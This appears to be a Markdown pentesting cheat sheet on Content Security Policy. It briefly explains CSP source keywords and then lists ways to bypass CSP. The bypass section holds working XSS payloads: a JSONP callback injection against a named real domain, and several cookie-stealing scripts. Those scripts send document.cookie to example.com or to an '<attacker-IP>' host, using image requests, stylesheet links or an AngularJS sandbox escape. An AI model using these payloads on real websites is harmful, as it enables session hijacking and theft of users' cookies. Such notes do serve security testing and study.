53 lines
1.9 KiB
Markdown
53 lines
1.9 KiB
Markdown
# Content Security Policy (CSP)
|
|
|
|
* Either in HTTP header or inside DOM's HTML
|
|
* [CSP directives](https://content-security-policy.com/#directive)
|
|
* [CSP evaluator](https://csp-evaluator.withgoogle.com/)
|
|
* [Bypassing csp](https://blog.0daylabs.com/2016/09/09/bypassing-csp/)
|
|
|
|
## Sources
|
|
* `*` wildcard
|
|
* `none`
|
|
* `self` for sources delivered through the same protocol
|
|
* `default-src 'self';` may not load any script
|
|
* `unsafe-inline`
|
|
* `unsafe-eval`
|
|
* `test.com` loads resources from domain but not subdomains
|
|
* `*.test.com` loads resources from subdomains
|
|
* `data:<content-type>...` critical usage
|
|
* `nonce` loads if nonce is correct. `sha256`, `sha384`, `sha512`
|
|
* [style hasher](https://report-uri.com/home/hash)
|
|
|
|
## Usage
|
|
|
|
### JSONP
|
|
Find JSONP endpoints through which to use custom callback functions
|
|
* [JSONBee](https://github.com/zigoo0/JSONBee)
|
|
```sh
|
|
"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
|
|
```
|
|
|
|
### Misconfiguration
|
|
Insert payload into `src` attribute
|
|
|
|
### Exfiltration
|
|
* [Beeceptor](beeceptor.com)
|
|
* Local webserver
|
|
* `connect-src` while Ajax/XHR requests are enabled
|
|
* Disguising as an `image-src` or `media-src` source
|
|
```html
|
|
<script>(new Image()).src = `https://example.com/${encodeURIComponent(document.cookie)}`</script>
|
|
```
|
|
other payloads
|
|
```sh
|
|
<link id="csp" rel=stylesheet href="" /><script nonce="abcdef">document.getElementById("csp").href="http://<attacker-IP>:8000/" + document.cookie;</script>
|
|
```
|
|
*
|
|
```sh
|
|
<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.3/prototype.min.js" integrity="sha512-C4LuwXQtQOF1iTRy3zwClYLsLgFLlG8nCV5dCxDjPcWsyFelQXzi3efHRjptsOzbHwwnXC3ZU+sWUh1gmxaTBA==" crossorigin="anonymous"></script>
|
|
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.2/angular.min.js"></script>
|
|
<div ng-app ng-csp>
|
|
{{$on.curry.call().document.location='https://<attacker-IP>/' + $on.curry.call().document.cookie}}
|
|
</div>
|
|
```
|